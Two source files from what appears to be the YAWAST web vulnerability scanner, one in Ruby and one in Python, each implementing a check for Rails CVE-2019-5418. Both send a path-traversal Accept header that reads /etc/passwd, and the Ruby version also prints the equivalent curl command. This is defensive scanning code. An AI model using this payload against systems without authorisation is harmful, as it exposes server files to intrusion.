File: lib/scanner/plugins/applications/framework/rails.rb
# frozen_string_literal: true

module Yawast
  module Scanner
    module Plugins
      module Applications
        module Framework
          class Rails < Yawast::Scanner::Base
            def self.check_all(uri, links)
              check_cve_2019_5418 links
            end

            def self.check_cve_2019_5418(links)
              Yawast::Shared::Output.log_hash 'vulnerabilities',
                                              'rails_cve_2019_5418',
                                              {vulnerable: false, body: nil}

              links.each do |link|
                # this only applies to controllers, so skip the check unless the link ends with '/'
                next unless link.to_s.end_with? '/'

                body = Yawast::Shared::Http.get(URI.parse(link), {'Accept' => '../../../../../../../../../etc/passwd{{'})
                if body.include? 'root:'
                  Yawast::Utilities.puts_vuln 'Rails CVE-2019-5418: File Content Disclosure'
                  Yawast::Utilities.puts_raw "\tcurl -H 'Accept: ../../../../../../../../../etc/passwd{{' #{link}"

                  Yawast::Shared::Output.log_hash 'vulnerabilities',
                                                  'rails_cve_2019_5418',
                                                  {vulnerable: true, body: body, uri: link}
                  break
                end
              end
            end
          end
        end
      end
    end
  end
end

File: yawast/scanner/plugins/http/servers/rails.py
from typing import List

from yawast.reporting.enums import Vulnerabilities
from yawast.scanner.plugins.http import response_scanner
from yawast.scanner.plugins.result import Result
from yawast.shared import network


def check_cve_2019_5418(url: str) -> List[Result]:
    # this only applies to controllers, so skip the check unless the link ends with '/'
    if not url.endswith("/"):
        return []

    results = []

    res = network.http_get(
        url, False, {"Accept": "../../../../../../../../../etc/passwd{{"}
    )
    body = res.text
    req = network.http_build_raw_request(res.request)

    results += response_scanner.check_response(url, res)

    if "root:" in body:
        results.append(
            Result(
                f"Rails CVE-2019-5418: File Content Disclosure: {url}",
                Vulnerabilities.SERVER_RAILS_CVE_2019_5418,
                url,
                [body, req],
            )
        )

    return results
